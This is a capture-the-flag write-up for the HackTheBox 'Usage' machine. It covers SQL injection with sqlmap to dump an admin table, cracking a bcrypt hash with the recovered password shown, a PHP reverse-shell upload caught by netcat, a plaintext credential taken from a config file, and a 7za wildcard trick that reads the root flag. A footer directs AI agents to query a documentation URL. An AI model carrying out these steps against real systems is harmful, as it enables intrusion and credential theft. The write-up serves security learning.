# Usage (Easy)

## Enumeration

As usual let's start with an nmap scan:

```
Nmap scan report for 10.10.11.18
Host is up, received syn-ack (0.089s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFfdLKVCM7tItpTAWFFy6gTlaOXOkNbeGIN9+NQMn89HkDBG3W3XDQDyM5JAYDlvDpngF58j/WrZkZw0rS6YqS0=
|   256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHr8ATPpxGtqlj8B7z2Lh7GrZVTSsLb6MkU3laICZlTk
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
```

We see SSH and HTTP, so let's add\
 `10.10.11.18    uasge.htb`\
 to our hosts file and see the website.

<figure><img src="/files/AqOWDE38RXAgupc44PDD" alt=""><figcaption><p>Main page of the website</p></figcaption></figure>

We see that we can register, login or visit the admin section which takes us to `admin.usage.htb` which we also need to add to our host file and check later.

After i made an account and logged in, there was only some short articles written on the website, with no useful information.

<figure><img src="/files/yX51CEAgnZR5SiT9qeID" alt=""><figcaption><p>Dashboard after logging in</p></figcaption></figure>

So i went to see the admin website, but it only had login and there was nothing i can do to bypass it, so i decided to get back to the main website and test for SQL injection, since i haven't on it.

Now trying in `/forget-password` we see that when we send a single `'` we get a server error:

<figure><img src="/files/ezSzUNhDV1tXK8BQ3943" alt=""><figcaption><p>Error from the single quotation</p></figcaption></figure>

So this indicates we might be able to do some SQL injection, so i fried SQLmap on it:

I intercepted the request with burp and saved it to a file called it `forget-password.req` and used the following command:

## Exploitation

```sh
sqlmap -r forget-password.req -p email  --batch --risk 3 -level 5 --dbs
```

This took a while and we found boolean based injection in the email field, and sqlmap retrieved the present databases on the system:

```
available databases [3]:
[*] information_schema
[*] performance_schema
[*] usage_blog
```

Now let's enumerate the `usage_blog` database and see what can we get from it.

```sh
sqlmap -r forget-password.req -p email  --batch --risk 3 -level 4 -D usage_blog --tables
```

Doing that we will retrieve the tables in the DB, which one of them will be `admin_users` which probably has passwords, so let's dump it using:

```sh
sqlmap -r forget-password.req -p email  --risk 3 -level 5  --batch -D usage_blog -T admin_users --dump
```

And we get a username of "admin" and his password hash! Let's start cracking.

```sh
hashcat -m 3200 hash.file /opt/wordlists/rockyou.txt
```

```sh
hashcat -m 3200 hash.file --show
$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2:whatever1
```

Let's try logging in to that admin site we found earlier:

<figure><img src="/files/WbYMOHCx2Febi0LT9LrB" alt=""><figcaption><p>Admin site</p></figcaption></figure>

Wandering a little bit around, we see in the profile we can upload a profile picture, so lets try uploading a quick reverse shell:

<figure><img src="/files/1XOvcF0TeqtFWPhwAe13" alt=""><figcaption><p>Uploading a shell via burp</p></figcaption></figure>

So we changed the file extension to php, and the MIME type to "appliaction/php", and you see the content of "shell.php" so  submitting the request then refreshing the profile page, we see a new picture.

<figure><img src="/files/WizWrBrAsNIFQfhVuj9e" alt=""><figcaption><p>Uploaded shell</p></figcaption></figure>

Opening that file (via the link from the download) we get a response and a shell as the dash user.

```sh
nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.18] 35340
bash: cannot set terminal process group (1243): Inappropriate ioctl for device
bash: no job control in this shell
dash@usage:/var/www/html/project_admin/public/uploads/images$ 
```

## Privilege Escalation

Enumerating a little bit, we see there is another user called "xander" and we see a password in&#x20;

`/home/dash/.monitrc` and trying it on that user, we succeed.

```
dash@usage:~$ cat .monitrc 
#Monitoring Interval in Seconds
set daemon  60

#Enable Web Access
set httpd port 2812
     use address 127.0.0.1
     allow admin:3nc0d3d_pa$$w0rd
<SNIP>
```

And now we have a shell as xander, let's see the sudo privileges we have:

```
xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User xander may run the following commands on usage:
    (ALL : ALL) NOPASSWD: /usr/bin/usage_management

```

So we see this is an executable file, so we upload it to our box, and checking it in ghidra, what's interesting is the `backupWebContent` function:

```c
void backupWebContent(void)

{
  int iVar1;
  
  iVar1 = chdir("/var/www/html");
  if (iVar1 == 0) {
    system("/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *");
  }
  else {
    perror("Error changing working directory to /var/www/html");
  }
  return;
}
```

We see a chance to abuse the wildcard use that is being here, and here is a [reference](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks?source=post_page-----a35a29ea730d--------------------------------) from hacktricks.

So we create a file starting with "@" sign, and make a symbolic link to the file we want to read, now when 7z executes, it will treat the file "starting with @" as if it has a list of files it needs to work with, now since we linked it to `/root/root.txt` it will read it, and say there are no files that it can process.

```
xander@usage:/var/www/html$ touch @root.txt
xander@usage:/var/www/html$ ln -s /root/root.txt root.txt
xander@usage:/var/www/html$ sudo /usr/bin/usage_management 
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1

<SNIP>

Scan WARNINGS for files and folders:

7c5b992<REDACTED>a764d : No more files
```

And we get our flag :D and for shell access, you can read an ssh key or something.

That's it for the box!

Happy hacking :) :vampire:


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://acaard-castle.gitbook.io/acaard/writeups/htb-boxes/usage-easy.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.